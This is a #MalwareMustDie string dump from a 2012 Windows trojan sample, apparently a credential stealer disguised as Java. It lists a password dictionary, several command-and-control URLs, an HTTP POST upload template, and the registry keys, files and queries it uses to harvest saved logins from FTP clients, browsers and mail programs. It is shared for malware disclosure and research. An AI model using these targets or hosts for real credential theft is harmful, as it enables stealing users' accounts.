#MalwareMustDie - Trojan Parfeit Data 20121222

#MalwareMustDie - Trojan Parfeit Data
#2012 Dec 21 | @unixfreaxjp

!This program cannot be run in DOS mode.
.text
`.rdata
@.data
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
jjj
jjj
jjjj
jjjj
CEPh
jjjjjj
kEP
jjjj
JEh
jjjj
jjjj
jjjj
jjjj
jjjj
KWk
jjjj
jjjj
jjjj
jjjj
jjjj
jjjj
jjjj
jjjj
jjjj
EPEPE
jjh
jjjj
jjjj
jjjj
Ejj
jjjj
EPE
jjjj
jjjj
EPE
EPE
EPEPE
PEPE
jjjj
EPEPE
EPEPE
EPEPE
EPEPE
Ejj
Ejj
EPE
jjjj
jjjj
jjjj
jjjj
jjjj
jjjj
Ejh
jjjj
jjjj
jjjj
jjjj
]hR"J
]hg#J
]hD$J
]hP%J
VWSh
SVW
PRj
PWj
t*PP
v;PP
WVj
VSW
h:MK
hjJK
h*JK
hhLK
WVS
SWV
Pj R
VWS
WSU
PSQRWV
^_ZY[X
VWPSQR
ZY[X_^
tTjZ
tgjZ
SWh
B,Ph
B,Ph
R,RP
SVW+
SVWh
SWj
h:QK
hZQK
h>RK
hIRK
h>RK
hIRK
h>RK
hlRK
h>RK
hlRK
h*RK
h*RK
h*RK
h3RK
hIRK
h>RK
hIRK
h3RK
hlRK
h>RK
hlRK
h3RK
hIRK
h>RK
hIRK
h3RK
hlRK
h>RK
hlRK
B,Ph
B,Ph
R,RP
tFh
B,Ph
B,Ph
Ph^TK
h"TK
Ph^TK
h;TK
Ph^TK
hUTK
Ph^TK
Ph^TK
hESK
hsSK
hfTK
hzTK
hfTK
hfTK
hfTK
hzTK
hfTK
hfTK
tch
h&UK
h9UK
hAVK
h0VK
hHUK
huUK
hHUK
h[UK
huUK
hHUK
h[UK
VWj
tshRVK
hnVK
h`VK
hnVK
hzVK
hmWK
hmWK
h}WK
h}WK
h!WK
h^WK
tNh
PPPh
hGXK
hYXK
hPXK
hbXK
PhlXK
tSh
h+XK
hqXK
hzXK
tSh
tYh
Ph\YK
h YK
hdYK
VWj
tKh
h"ZK
h6ZK
h-ZK
hSZK
hCZK
hJZK
Ph\ZK
tEh
hdZK
tlj
tKh
hG[K
tSh
hQ[K
hQ[K
tSh
tNh1\K
PPPh
hL\K
hz\K
PPh
VWj
PPh
PPh
PhL]K
PhW]K
hb]K
hb]K
w%hz]K
tgh
VWj
tah
VWS
PVV
t)PP
QSV
t?h6^K
B,Ph
B,Ph
R,RP
B,Ph
B,Ph
Ph=^K
hC^K
he^K
hM^K
PhC^K
hu^K
hM^K
PhC^K
t$PP
PhC^K
tcP
tHh
hQ_K
ha_K
PPh
hm_K
DaK
DaK
=DaK
5DaK
5DaK
DaK
=DaK
5DaK
DaK
=DaK
h(aK
h(aK
hI`K
h6bK
Ph6bK
h=bK
Ph=bK
h6bK
Ph6bK
h=bK
Ph=bK
h2bK
B,Ph
B,Ph
R,RP
uFhwaK
hHaK
hUaK
hhaK
h]aK
tWj
hmaK
tAPP
h!bK
h!bK
hBbK
h!bK
h!bK
h]bK
hSbK
h!bK
h]bK
hSbK
h!bK
hwbK
hqbK
h!bK
hwbK
hqbK
h!bK
h!bK
h!bK
VWj
tEh
VWj
tEh
h=cK
hIcK
hTcK
hicK
h_cK
hicK
h6dK
h6dK
PPP
VWS
h-eK
h9eK
toh
VWj
tEhLeK
hVeK
VWh
uEh
hteK
PhD
h`eK
hieK
h`eK
hieK
h`eK
hieK
h)fK
h`eK
hieK
h5fK
h>fK
hHfK
hPfK
hcfK
t|hZfK
hmfK
h|fK
tYhwfK
tGh
tGh
hSgK
h.gK
h.gK
h.gK
Ph%gK
h.gK
hbgK
h]gK
h[hK
ueh]hK
h]hK
h&hK
t5PP
h?hK
h0hK
hKhK
h!hK
tQhnhK
hfhK
huhK
tdh
tkP
VWj
h-iK
h0iK
h:iK
hfiK
hkiK
hpiK
huiK
hziK
tSh
hGiK
tYh
hEjK
h\jK
hqjK
tYh
h)jK
h)jK
VWj
tEh
VWj
tEh
h$kK
VWj
tEh0kK
hBkK
hMkK
tGh
hekK
hekK
VWj
tEh
h/lK
h:lK
klK
hflK
hhlK
5blK
hNlK
hNlK
hNlK
hblK
hYlK
hGmK
h*mK
hZmK
hGmK
h*mK
hZmK
hOmK
h*mK
hZmK
hOmK
h*mK
hZmK
tSh
PPh
hfmK
hfmK
h'nK
Ph3nK
h@nK
hLnK
h@nK
hLnK
hknK
hknK
h@nK
hXnK
hLnK
hXnK
h@nK
hanK
hLnK
hanK
WVS+
tZP
7horK
h(rK
hBrK
hdrK
PPP
PPh
huqK
h!bK
EPEP
SEPp
SEP
EPG
VEP
VEP
EPo
EPa
VEP
PEPw
VEPj
pSettings
JTJ
JZJ
JGJ
JCJ
JDJuJ
JGJ}J
jwN
h!bK
h!bK
h!bK
VWj
tEh
YtK
UPh
5YtK
5YtK
hutK
hyIK
PhitK
UhVGK
SWU
aGK
PhitK
5atK
atK
SWU
atK
=etK
5etK
etK
5etK
5etK
etK
hVGK
UVW3
trS
tJO@
ri)D$
vGSQ
uFSQ
+L$PR
+T$PQ
L$\RQ
PSQ
9D$(ub
L$8WQ
D$ HP
QBR
D$LP
D$DPQ
D$@RP
v89l$D|0
L$(UQ
D$@RP
uM9l$D}G
D$@RP
L$(UQ
D$(UP
D$(UP
T$0PR
D$(UP
T$0PR
D$(UP
T$0WR
D$8WP
WSP
L$8WQ
WRP
D$8WP
L$8WQ
USP
L$(UQ
D$(UP
T$0WR
D$8WP
WUP
L$8WQ
D$TCH
T$8WR
+T$PQ
+L$PRQW
SVW
SVW
PPS
SVW
PPS
SVW
SVW
SVW
SVW
PPSV
aPLib v1.01  -  the smaller the better :)
Copyright (c) 1998-2009 by Joergen Ibsen, All Rights Reserved.
More information: http://www.ibsensoftware.com/
HzS
password
phpbb
qwerty
jesus
abc123
letmein
test
love
password1
hello
monkey
dragon
trustno1
iloveyou
shadow
christ
sunshine
master
computer
princess
tigger
football
angel
jesus1
whatever
freedom
killer
asdf
soccer
superman
michael
cheese
internet
joshua
fuckyou
blessed
baseball
starwars
purple
jordan
faith
summer
ashley
buster
heaven
pepper
hunter
lovely
andrew
thomas
angels
charlie
daniel
jennifer
single
hannah
qazwsx
happy
matrix
pass
aaaaaa
amanda
nothing
ginger
mother
snoopy
jessica
welcome
pokemon
iloveyou1
mustang
helpme
justin
jasmine
orange
testing
apple
michelle
peace
secret
grace
william
iloveyou2
nicole
muffin
gateway
fuckyou1
asshole
hahaha
poop
blessing
blahblah
myspace1
matthew
canada
silver
robert
forever
asdfgh
rachel
rainbow
guitar
peanut
batman
cookie
bailey
soccer1
mickey
biteme
hello1
eminem
dakota
samantha
compaq
diamond
taylor
forum
john316
richard
blink182
peaches
cool
flower
scooter
banana
james
asdfasdf
victory
london
123qwe
startrek
george
winner
maggie
trinity
online
123abc
chicken
junior
chris
passw0rd
austin
sparky
admin
merlin
google
friends
hope
shalom
nintendo
looking
harley
smokey
joseph
lucky
digital
thunder
spirit
bandit
enter
anthony
corvette
hockey
power
benjamin
iloveyou!
1q2w3e
viper
genesis
knight
qwerty1
creative
foobar
adidas
rotimi
slayer
wisdom
praise
zxcvbnm
samuel
mike
dallas
green
testtest
maverick
onelove
david
mylove
church
friend
god
destiny
none
microsoft
bubbles
cocacola
jordan23
ilovegod
football1
loving
nathan
emmanuel
scooby
fuckoff
sammy
maxwell
jason
john
1q2w3e4r
baby
red123
blabla
prince
qwert
chelsea
angel1
hardcore
dexter
saved
hallo
jasper
danielle
kitten
cassie
stella
prayer
hotdog
windows
mustdie
gates
billgates
ghbdtn
gfhjkm
hgTYDOMium
http://132.248.49.112:8080/asp/intro.php
http://113.130.65.77:8080/asp/intro.php
http://203.113.98.131:8080/asp/intro.php
http://110.164.58.250:8080/asp/intro.php
http://200.108.18.158:8080/asp/intro.php
http://207.182.144.115:8080/asp/intro.php
http://148.208.216.70:8080/asp/intro.php
http://203.172.252.26:8080/asp/intro.php
http://202.6.120.103:8080/asp/intro.php
http://203.146.208.180:8080/asp/intro.php
http://207.126.57.208:8080/asp/intro.php
http://203.80.16.81:8080/asp/intro.php
http://202.180.221.186:8080/asp/intro.php
YUIPWDFILE0YUIPKDFILE0YUICRYPTED0YUI1.0
MODU
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
UninstallString
DisplayName
.exe
Software\WinRAR
open
kernel32.dll
WTSGetActiveConsoleSessionId
ProcessIdToSessionId
netapi32.dll
NetApiBufferFree
NetUserEnum
ole32.dll
StgOpenStorage
advapi32.dll
AllocateAndInitializeSid
CheckTokenMembership
FreeSid
CredEnumerateA
CredFree
CryptGetUserKey
CryptExportKey
CryptDestroyKey
CryptReleaseContext
RevertToSelf
OpenProcessToken
ImpersonateLoggedOnUser
GetTokenInformation
ConvertSidToStringSidA
LogonUserA
LookupPrivilegeValueA
AdjustTokenPrivileges
crypt32.dll
CryptUnprotectData
CertOpenSystemStoreA
CertEnumCertificatesInStore
CertCloseStore
CryptAcquireCertificatePrivateKey
msi.dll
MsiGetComponentPathA
pstorec.dll
PStoreCreateInstance
z%Y]I(Y
[shell32.dll
SHGetFolderPathA
a}vMK
yNK
My Documents
AppData
Local AppData
Cache
Cookies
History
My Documents
Common AppData
My Pictures
Common Documents
Common Administrative Tools
Administrative Tools
Personal
Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
explorer.exe
SeImpersonatePrivilege
SeTcbPrivilege
SeChangeNotifyPrivilege
SeCreateTokenPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeIncreaseQuotaPrivilege
SeAssignPrimaryTokenPrivilege
POST %s HTTP/1.0
Host: %s
Accept: */*
Accept-Encoding: identity, *;q=0
Content-Length: %lu
Connection: close
Content-Type: application/octet-stream
Content-Encoding: binary
User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
Content-Length:
Location:
HWID
{%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X}
GetNativeSystemInfo
kernel32.dll
IsWow64Process
Software\Far\Plugins\FTP\Hosts
Software\Far2\Plugins\FTP\Hosts
Software\Far Manager\Plugins\FTP\Hosts
Software\Far\SavedDialogHistory\FTPHost
Software\Far2\SavedDialogHistory\FTPHost
Software\Far Manager\SavedDialogHistory\FTPHost
Password
HostName
User
Line
wcx_ftp.ini
\GHISLER
InstallDir
FtpIniName
Software\Ghisler\Windows Commander
Software\Ghisler\Total Commander
\Ipswitch
Sites\
\Ipswitch\WS_FTP
\win.ini
.ini
WS_FTP
DIR
DEFDIR
CUTEFTP
QCHistory
Software\GlobalSCAPE\CuteFTP 6 Home\QCToolbar
Software\GlobalSCAPE\CuteFTP 6 Professional\QCToolbar
Software\GlobalSCAPE\CuteFTP 7 Home\QCToolbar
Software\GlobalSCAPE\CuteFTP 7 Professional\QCToolbar
Software\GlobalSCAPE\CuteFTP 8 Home\QCToolbar
Software\GlobalSCAPE\CuteFTP 8 Professional\QCToolbar
\GlobalSCAPE\CuteFTP
\GlobalSCAPE\CuteFTP Pro
\GlobalSCAPE\CuteFTP Lite
\CuteFTP
\sm.dat
Software\FlashFXP\3
Software\FlashFXP
Software\FlashFXP\4
InstallerDathPath
path
Install Path
DataFolder
\Sites.dat
\Quick.dat
\History.dat
\FlashFXP\3
\FlashFXP\4
\FileZilla
\sitemanager.xml
\recentservers.xml
\filezilla.xml
Software\FileZilla
Software\FileZilla Client
Install_Dir
Host
User
Pass
Port
Remote Dir
Server Type
Server.Host
Server.User
Server.Pass
Server.Port
Path
ServerType
Last Server Host
Last Server User
Last Server Pass
Last Server Port
Last Server Path
Last Server Type
FTP Navigator
FTP Commander
ftplist.txt
\BulletProof Software
.dat
.bps
Software\BPFTP\Bullet Proof FTP\Main
Software\BulletProof Software\BulletProof FTP Client\Main
Software\BPFTP\Bullet Proof FTP\Options
Software\BulletProof Software\BulletProof FTP Client\Options
Software\BPFTP
LastSessionFile
SitesDir
InstallDir1
.xml
\SmartFTP
Favorites.dat
History.dat
addrbk.dat
quick.dat
\TurboFTP
Software\TurboFTP
installpath
Software\Sota\FFFTP
CredentialSalt
CredentialCheck
Software\Sota\FFFTP\Options
Password
UserName
HostAdrs
RemoteDir
Port
HostName
Port
Username
Password
HostDirName
Software\CoffeeCup Software\Internet\Profiles
Software\FTPWare\COREFTP\Sites
Host
User
Port
PthR
SSH
profiles.xml
\FTP Explorer
Software\FTP Explorer\FTP Explorer\Workspace\MFCToolBar-224
Buttons
Software\FTP Explorer\Profiles
Password
PasswordType
Host
Login
Port
InitialPath
FtpSite.xml
\Frigate3
.ini
\VanDyke\Config\Sessions
\Sessions
Software\VanDyke\SecureFX
Config Path
UltraFXP
\sites.xml
\FTPRush
RushSite.xml
Server
Username
Password
FtpPort
Software\Cryer\WebSitePublisher
\BitKinex
bitkinex.ds
Hostname
Username
Password
Port
Software\ExpanDrive\Sessions
\ExpanDrive
\drives.js
"password" : "
Software\ExpanDrive
ExpanDrive_Home
Server
UserName
Password
_Password
Directory
Software\NCH Software\ClassicFTP\FTPAccounts
FtpServer
FtpUserName
FtpPassword
_FtpPassword
FtpDirectory
SOFTWARE\NCH Software\Fling\Accounts
Software\FTPClient\Sites
Software\SoftX.org\FTPClient\Sites
.oxc
.oll
ftplast.osd
\GPSoftware\Directory Opus
\SharedSettings.ccs
\SharedSettings_1_0_5.ccs
\SharedSettings.sqlite
\SharedSettings_1_0_5.sqlite
\CoffeeCup Software
leapftp
unleap.exe
sites.dat
sites.ini
\LeapWare\LeapFTP
SOFTWARE\LeapWare
InstallPath
DataDir
Password
HostName
UserName
RemoteDirectory
PortNumber
FSProtocol
Software\Martin Prikryl
\32BitFtp.ini
NDSites.ini
\NetDrive
PassWord
Url
UserName
RootDirectory
Port
Software\South River Technologies\WebDrive\Connections
ServerType
FTP CONTROL
FTPCON
.prf
\Profiles
ftp://
opera
wand.dat
_Software\Opera Software
Last Directory3
Last Install Path
Opera.HTML\shell\open\command
wiseftpsrvs.bin
\AceBIT
Software\AceBIT
MRU
SOFTWARE\Classes\TypeLib\{CB1F2C0F-8094-4AAC-BCF5-41A64E27F777}
SOFTWARE\Classes\TypeLib\{9EA55529-E122-4757-BC79-E4825F80732C}
wiseftpsrvs.ini
wiseftp.ini
FTPVoyager.ftp
FTPVoyager.qc
\RhinoSoft.com
nss3.dll
NSS_Init
NSS_Shutdown
NSSBase64_DecodeBuffer
SECITEM_FreeItem
PK11_GetInternalKeySlot
PK11_Authenticate
PK11SDR_Decrypt
PK11_FreeSlot
sqlite3.dll
sqlite3_open
sqlite3_close
sqlite3_prepare
sqlite3_step
sqlite3_column_bytes
sqlite3_column_blob
mozsqlite3.dll
sqlite3_open
sqlite3_close
sqlite3_prepare
sqlite3_step
sqlite3_column_bytes
sqlite3_column_blob
profiles.ini
Profile
IsRelative
Path
PathToExe
prefs.js
signons.sqlite
signons.txt
signons2.txt
signons3.txt
SELECT hostname, encryptedUsername, encryptedPassword FROM moz_logins
Firefox
\Mozilla\Firefox\
Software\Mozilla
ftp://
ftp.
fireFTPsites.dat
SeaMonkey
\Mozilla\SeaMonkey\
Flock
\Flock\Browser\
Mozilla
\Mozilla\Profiles\
Software\LeechFTP
AppDir
LocalDir
bookmark.dat
SiteInfo.QFP
Odin
Favorites.dat
WinFTP
sites.db
CLSID\{11C1D741-A95B-11d2-8A80-0080ADB32FF4}\InProcServer32
servers.xml
\FTPGetter
ESTdb2.dat
QData.dat
\Estsoft\ALFTP
Internet Explorer
WininetCacheCredentials
MS IE FTP Passwords
DPAPI:
Software\Microsoft\Internet Explorer\IntelliForms\Storage2
Microsoft_WinInet_*
ftp://
Software\Adobe\Common
SiteServers
SiteServer %d\Host
SiteServer %d\WebUrl
SiteServer %d\Remote Directory
SiteServer %d-User
SiteServer %d-User PW
%s\Keychain
SiteServer %d\SFTP
DeluxeFTP
sites.xml
Web Data
Login Data
SQLite format 3
table
CONSTRAINT
PRIMARY
UNIQUE
CHECK
FOREIGN
logins
origin_url
password_value
username_value
ftp://
\Google\Chrome
\Chromium
\ChromePlus
Software\ChromePlus
Install_Dir
\Bromium
\Nichrome
\Comodo
\RockMelt
K-Meleon
\K-Meleon
\Profiles
Epic
\Epic\Epic
Staff-FTP
sites.ini
\Sites
\Visicom Media
.ftp
\Global Downloader
SM.arch
FreshFTP
.SMF
BlazeFtp
site.dat
LastPassword
LastAddress
LastUser
LastPort
Software\FlashPeak\BlazeFtp\Settings
\BlazeFtp
.fpl
FTP++.Link\shell\open\command
GoFTP
Connections.txt
3D-FTP
sites.ini
\3D-FTP
\SiteDesigner
SOFTWARE\Classes\TypeLib\{F9043C88-F6F2-101A-A3C9-08002B2F49FB}\1.2\0\win32
EasyFTP
\NetSarang
.xfp
.rdp
TERMSRV/*
password 51:b:
username:s:
full address:s:
TERMSRV/
FTP Now
FTPNow
sites.xml
SOFTWARE\Robo-FTP 3.7\Scripts
SOFTWARE\Robo-FTP 3.7\FTPServers
FTP Count
FTP File%d
Password
ServerName
UserID
InitialDirectory
PortNumber
ServerType
fMY
Software\LinasFTP\Site Manager
Host
User
Pass
Port
Remote Dir
\Cyberduck
.duck
user.config
<setting name="
value="
Software\SimonTatham\PuTTY\Sessions
HostName
UserName
Password
PortNumber
TerminalType
NppFTP.xml
\Notepad++
Software\CoffeeCup Software
FTP destination server
FTP destination user
FTP destination password
FTP destination port
FTP destination catalog
FTP profiles
FTPShell
ftpshell.fsi
Software\MAS-Soft\FTPInfo\Setup
DataDir
\FTPInfo
ServerList.xml
NexusFile
ftpsite.ini
FastStone Browser
FTPList.db
\MapleStudio\ChromePlus
Software\Nico Mak Computing\WinZip\FTP
Software\Nico Mak Computing\WinZip\mru\jobs
Site
UserID
xflags
Port
Folder
.wjf
winex="
\Yandex
My FTP
project.ini
.xml
{74FF1730-B1F2-4D88-926B-1568FAE61DB7}
NovaFTP.db
\INSoftware\NovaFTP
.oeaccount
Salt
<POP3_Password2
<SMTP_Password2
<IMAP_Password2
<HTTPMail_Password2
\Microsoft\Windows Live Mail
Software\Microsoft\Windows Live Mail
\Microsoft\Windows Mail
Software\Microsoft\Windows Mail
Software\RimArts\B2\Settings
DataDir
DataDirBak
Mailbox.ini
Software\Poco Systems Inc
Path
\PocoSystem.ini
Program
DataPath
accounts.ini
\Pocomail
Software\IncrediMail
EmailAddress
Technology
PopServer
PopPort
PopAccount
PopPassword
SmtpServer
SmtpPort
SmtpAccount
SmtpPassword
account.cfg
account.cfn
\BatMail
\The Bat!
Software\RIT\The Bat!
Software\RIT\The Bat!\Users depot
Working Directory
ProgramDir
Count
Default
Dir #%d
SMTP Email Address
SMTP Server
POP3 Server
POP3 User Name
SMTP User Name
NNTP Email Address
NNTP User Name
NNTP Server
IMAP Server
IMAP User Name
Email
HTTP User
HTTP Server URL
POP3 User
IMAP User
HTTPMail User Name
HTTPMail Server
SMTP User
POP3 Port
SMTP Port
IMAP Port
POP3 Password2
IMAP Password2
NNTP Password2
HTTPMail Password2
SMTP Password2
POP3 Password
IMAP Password
NNTP Password
HTTP Password
SMTP Password
Software\Microsoft\Internet Account Manager\Accounts
Identities
Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Microsoft Outlook Internet Settings
Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
Software\Microsoft\Internet Account Manager
Outlook
\Accounts
identification
identitymgr
inetcomm server passwords
outlook account manager passwords
identities
{%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X}
Thunderbird
\Thunderbird
FastTrack
ftplist.txt
YfJ
NgJ
XhJ
ZoJ
iuJ
nvJ
qxJ
Client Hash
STATUS-IMPORT-OK
IugvO%gv
qUS
qUj
KERNEL32.DLL
advapi32.dll
ole32.dll
shlwapi.dll
user32.dll
userenv.dll
wininet.dll
wsock32.dll
CreateFileA
ReadFile
CloseHandle
WriteFile
lstrlenA
GlobalLock
GlobalUnlock
LocalFree
LocalAlloc
lstrcpyA
lstrcatA
GetFileAttributesA
ExpandEnvironmentStringsA
GetFileSize
CreateFileMappingA
MapViewOfFile
UnmapViewOfFile
LoadLibraryA
GetProcAddress
GetTempPathA
CreateDirectoryA
DeleteFileA
GetCurrentProcess
WideCharToMultiByte
GetLastError
lstrcmpA
CreateToolhelp32Snapshot
Process32First
OpenProcess
Process32Next
FindFirstFileA
lstrcmpiA
FindNextFileA
FindClose
GetModuleHandleA
GetVersionExA
GetLocaleInfoA
GetSystemInfo
GetWindowsDirectoryA
GetPrivateProfileStringA
SetCurrentDirectoryA
GetPrivateProfileSectionNamesA
GetPrivateProfileIntA
GetCurrentDirectoryA
lstrlenW
MultiByteToWideChar
GetTickCount
Sleep
LCMapStringA
ExitProcess
SetUnhandledExceptionFilter
RegOpenKeyExA
RegQueryValueExA
RegCloseKey
RegOpenKeyA
RegEnumKeyExA
RegCreateKeyA
RegSetValueExA
IsTextUnicode
RegOpenCurrentUser
RegEnumValueA
GetUserNameA
CreateStreamOnHGlobal
GetHGlobalFromStream
CoCreateGuid
CoTaskMemFree
OleInitialize
StrStrIA
StrRChrIA
StrToIntA
StrStrA
StrCmpNIA
wsprintfA
LoadUserProfileA
UnloadUserProfile
InternetCrackUrlA
InternetCreateUrlA
inet_addr
gethostbyname
socket
connect
closesocket
send
select
recv
setsockopt
WSAStartup
jHq
kdz
rqg
LhX
Qkkbal
Zjz
i]Wb
knv
owG
kaE
MGiI
wn>Jj
Invalid filename.
Failed to open document.
Failed to save document.
Save changes to %1? Failed to create empty document.
The file is too large to open.
Could not start print job.
Failed to launch help.
Internal application error.
Command failed.)Insufficient memory to perform operation.PSystem registry entries have
VS_VERSION_INFO
StringFileInfo
CompanyName
Sun Microsystems, Inc.
FileDescription
Java(TM) Platform SE binary
FileVersion
Full Version
InternalName
java
LegalCopyright
Copyright
OriginalFilename
java.exe
ProductName
Java(TM) Platform SE 6 U37
ProductVersion
VarFileInfo
Translation
wwwwwww
wwwwwwwwwww
wwwx
www
wwwww
wwwwwwx
wwx
wwwwwww
wwwwwwwx
wwwwwx
wwwx
wwww
xww
wwwww
wwx
www
wwww
wwww
www
-------
#MalwareMustDie!!!!!